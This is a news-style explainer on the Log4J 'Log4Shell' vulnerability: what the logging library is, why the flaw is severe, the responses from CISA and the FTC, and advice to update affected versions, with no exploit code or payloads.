Will Log4J Break the Internet? Experts Say Maybe.

One of the digital world’s most dangerous security breaches is currently unfolding, sending everyone from governmental agencies to cybersecurity experts scrambling to patch the hole. It comes at the hands of a critical software vulnerability discovered in Log4J, a Java-based software library used in nearly a third of all web servers in the world. Also known as “Log4Shell”, the vulnerability, which was first announced publicly by the sandbox video game Minecraft, has since been classified as a 10 out of 10 level threat – the most severe category in cybersecurity. “This vulnerability is one of the most serious that I’ve seen in my entire career, if not the most serious,” said Jen Easterly, Director of the US Cybersecurity and Infrastructure Security Agency (CISA). Companies and governmental agencies have been advised to take immediate steps to mitigate catastrophic damage. But why is a vulnerability in Log4J – a term most casual computer users aren’t likely familiar with – so serious, and what should you do? Here’s what we know so far.

What is Log4J and who uses it?

Log4J is an open-source logging library that allows software developers to record and monitor what’s happening in their software applications and online services. This is called ‘logging’, and it essentially creates a running journal of system and user activity developers can use to identify problems or track data within their programs. Logging can record, and in some cases respond to, everything from error messages to user data to system status and more. Because it’s free to use and easily inserted as a line of Java code, Log4J is one of the most ubiquitous pieces of software in the world. It’s found in web applications, cloud services, and email systems. It’s used in services and software run by tech giants like Apple, Amazon, and Google. It’s even used to power everything from hospital devices to car navigation systems to governmental agencies.

Why is it so serious?

The vulnerability, which allows hackers to insert lines of malicious code into Log4J’s record-keeping, can provide password-free access into any web server that runs the software. Unlike many high-level security threats, Log4Shell is exceptionally easy to exploit – some hackers have already found success by pasting simple messages in Minecraft chat boxes. According to a statement from CISA on December 10, 2021, this means that “any remote attacker could exploit this vulnerability to take control of an entire affected system.” One of the most serious threats is how foreign hackers could infiltrate critical U.S. infrastructure systems like power, water, energy, and communications, though cybersecurity researchers believe everything from company databases to consumer electronics are also at risk. The ubiquitous nature of Log4J also makes the vulnerability particularly difficult to address. While companies and organizations that use the logging utility can easily apply patches, the software is often embedded in third-party applications that can only be updated by the owner. That means hundreds of millions of devices are currently running the vulnerable software with none the wiser. In the meantime, hackers are making millions of attempts at exploiting the vulnerability every day.

How are companies responding?

Security teams across the world have worked day and night to roll out updates geared towards fixing the problem. Many major companies like Microsoft and IBM have already made internal fixes and released patches for consumers to download on their own devices. While individuals are encouraged to protect themselves by applying updates as they’re released, companies bear a bit more responsibility. According to the Federal Trade Commission, companies are legally obligated to take necessary steps to mitigate financial and data losses caused by known vulnerabilities. “It is critical that companies and their vendors relying on Log4J act now, in order to reduce the likelihood of harm to consumers, and to avoid FTC legal action,” the organization said on January 4, 2022. “The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.”

What should companies do?

The Cybersecurity and Infrastructure Security Agency (CISA) has published guidelines to help companies determine if they’re using a vulnerable version of the Log4J software (versions 2.0-beta9 to 2.14.1). If you are using Log4J, you should immediately update your software to the latest version and inform any relevant third-party organizations (like your managed service provider) about the risk. Additional steps to mitigate damage can be found on the CISA website.